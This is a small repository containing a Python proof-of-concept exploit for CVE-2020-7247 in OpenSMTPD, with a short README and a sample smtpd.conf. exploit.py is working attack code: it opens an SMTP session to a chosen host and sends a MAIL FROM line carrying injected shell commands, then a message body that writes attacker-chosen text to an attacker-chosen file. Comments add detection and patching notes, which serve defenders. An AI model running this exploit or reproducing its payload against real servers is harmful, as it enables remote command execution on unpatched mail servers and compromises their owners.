├── README.md
├── exploit.py
└── smtpd.conf


/README.md:
--------------------------------------------------------------------------------
# cve-2020-7247-exploit
Python exploit of cve-2020-7247


Read about the vulnerability:
https://blog.firosolutions.com/exploits/opensmtpd-remote-vulnerability/

--------------------------------------------------------------------------------
/exploit.py:
--------------------------------------------------------------------------------
# Proof-of-concept SMTP client for CVE-2020-7247 (see README.md).
#
# The script opens a single SMTP session to port 25 of a host given on stdin
# and walks through HELO, MAIL FROM, RCPT TO, DATA and QUIT. What sets it apart
# from a normal mail client is the envelope sender (MAIL FROM), which holds
# shell syntax rather than an address, and the message body, which holds one
# `echo ... > file` line built from two more stdin prompts.
#
# Defender notes:
#   * The MAIL FROM string is the observable artifact of this session; see the
#     comment at that send for what to look for in SMTP logs and captures.
#   * The durable fix is running an OpenSMTPD release that carries the vendor
#     fix for this CVE. Narrowing the listener (see smtpd.conf in this
#     repository) reduces who can reach the service but does not fix it.
import socket, time
import sys

# Target address, read interactively; nothing validates it before getaddrinfo().
HOST = input("what is the ip address of the host?: ")
PORT = 25              # The same port as used by the server
s = None

# Two free-form strings from stdin. Both are spliced, unescaped, into the
# `echo` line of the message body below.
writeto = input("Which file do you want to write to?: ")  # raw input
writewhat = input("What do you want to write to the file?: ")
# Message body sent after DATA. It starts with a CRLF and a blank line, then
# fourteen lines "#0".."#d" -- the same count as the `read` loop in the
# MAIL FROM string further down (presumably padding for that loop; verify
# against the write-up linked in the README). The `echo` line is the only part
# derived from user input, and the lone "." line ends the DATA section.
payload = b"""\r\n

#0\r\n
#1\r\n
#2\r\n
#3\r\n
#4\r\n
#5\r\n
#6\r\n
#7\r\n
#8\r\n
#9\r\n
#a\r\n
#b\r\n
#c\r\n
#d\r\n
echo '"""+writewhat.encode()+b"""' > """+writeto.encode()+b"""
.
"""

# Try every address getaddrinfo() returns for HOST (AF_UNSPEC allows IPv4 and
# IPv6) and keep the first socket that connects; `s` stays None if all fail.
for res in socket.getaddrinfo(HOST, PORT, socket.AF_UNSPEC, socket.SOCK_STREAM):
    af, socktype, proto, canonname, sa = res
    try:
        s = socket.socket(af, socktype, proto)
    except OSError as msg:
        s = None
        continue
    try:
        s.connect(sa)
    except OSError as msg:
        s.close()
        s = None
        continue
    break
if s is None:
    print('could not open socket')
    sys.exit(1)
with s:
    # Read and print the server's greeting banner (at most 1024 bytes).
    data = s.recv(1024)
    print('Received', repr(data))
    time.sleep(1)
    print('sending')
    s.send(b"helo test.com\r\n")
    data = s.recv(1024)
    print('Received', repr(data))
    # The envelope sender below is not a mail address: between the angle
    # brackets it holds ';' separators, a loop of 14 `read` calls, `sh` and
    # `exit 0`. CVE-2020-7247 concerns OpenSMTPD accepting a sender like this;
    # a fixed server is expected to refuse it at this step -- TODO confirm
    # against the vendor advisory.
    # Detection: RFC 5321 does not allow ';' or spaces in an unquoted local
    # part, so a MAIL FROM value containing them in smtpd logs or in a network
    # capture is a strong indicator of an attempt against this flaw.
    s.send(b"MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>\r\n")
    time.sleep(1)
    data = s.recv(1024)
    print('Received', repr(data))
    s.send(b"RCPT TO:\r\n")
    data = s.recv(1024)
    print('Received', repr(data))
    s.send(b"DATA\r\n")
    data = s.recv(1024)
    print('Received', repr(data))
    # Send the body built above; each reply is only printed, never checked,
    # so the script gives no reliable signal about what the server did.
    s.send(payload)
    data = s.recv(1024)
    print('Received', repr(data))
    s.send(b"QUIT\r\n")
    data = s.recv(1024)
    print('Received', repr(data))
print("done")
# The `with` block has already closed the socket; this second close is a no-op.
s.close()

--------------------------------------------------------------------------------
/smtpd.conf:
--------------------------------------------------------------------------------
#	$OpenBSD: smtpd.conf,v 1.9 2016/05/03 18:43:45 jung Exp $

# This is the smtpd server system-wide configuration file.
# See smtpd.conf(5) for more information.


# Uncomment the following to accept external mail for domain "example.org"
#
# accept from any for domain "example.org" alias deliver to mbox
#accept for local deliver to mbox
#accept from local for any relay
table aliases file:/etc/mail/aliases
table secrets file:/etc/mail/secrets

# NOTE(review): `listen on lo0` binds the daemon to the loopback interface, so
# with this configuration the SMTP service is reachable from the local host
# only. That narrows who can reach the CVE-2020-7247 code path but does not
# remove it; the installed OpenSMTPD still needs the vendor fix.
listen on lo0

action "local" mbox alias
action "relay" relay host smtp+tls://bob@smtp.example.com \
	auth

match for local action "local"
match for any action "relay"

--------------------------------------------------------------------------------